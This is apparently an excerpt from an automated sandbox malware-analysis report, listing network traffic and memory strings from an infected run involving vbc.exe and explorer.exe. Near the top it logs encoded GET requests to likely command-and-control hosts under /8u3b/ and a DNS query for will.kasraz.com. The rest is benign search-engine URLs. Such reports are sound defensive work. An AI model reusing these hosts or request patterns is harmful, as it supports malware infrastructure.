          Source: global trafficHTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg== HTTP/1.1Host: www.burundiacademyst.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.pipienta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: will.kasraz.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 May 2021 15:00:21 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeSet-Cookie: __cfduid=d94f65b7ed78b4bb4ec06c920816dea0c1620140420; expires=Thu, 03-Jun-21 15:00:20 GMT; path=/; domain=.www.burundiacademyst.com; HttpOnly; SameSite=LaxCF-Cache-Status: MISScf-request-id: 09d97e072e00004e44b212b000000001Server: cloudflareCF-RAY: 64a2991eb90d4e44-FRAData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2171469708.0000000002281000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
